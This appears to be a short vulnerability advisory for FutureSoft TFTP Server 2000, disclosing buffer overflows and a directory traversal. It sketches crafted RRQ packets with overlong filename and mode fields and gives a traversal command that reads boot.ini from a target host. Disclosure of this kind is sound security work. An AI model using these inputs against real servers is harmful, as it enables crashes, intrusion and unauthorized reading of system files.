|
FutureSoft TFTP Server 2000 Multiple Remote Vulnerabilities
The following proof-of-concept examples are available: A crafted packet with an overly long filename string. ------------------------------------------ |RRQ|AAAAAAAAAAAAAAAA....|NULL|octet|NULL| ------------------------------------------ A crafted packet with an overly long transfer-mode string. ------------------------------------------ |RRQ|a.txt|NULL|AAAAAAAAAAAAAAA.....|NULL| ------------------------------------------ tftp -i 192.168.2.5 GET ../../../../../boot.ini A Metasploit proof-of-concept exploit is available from y0@w00t-shell.net: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. |
|
|
Privacy Statement |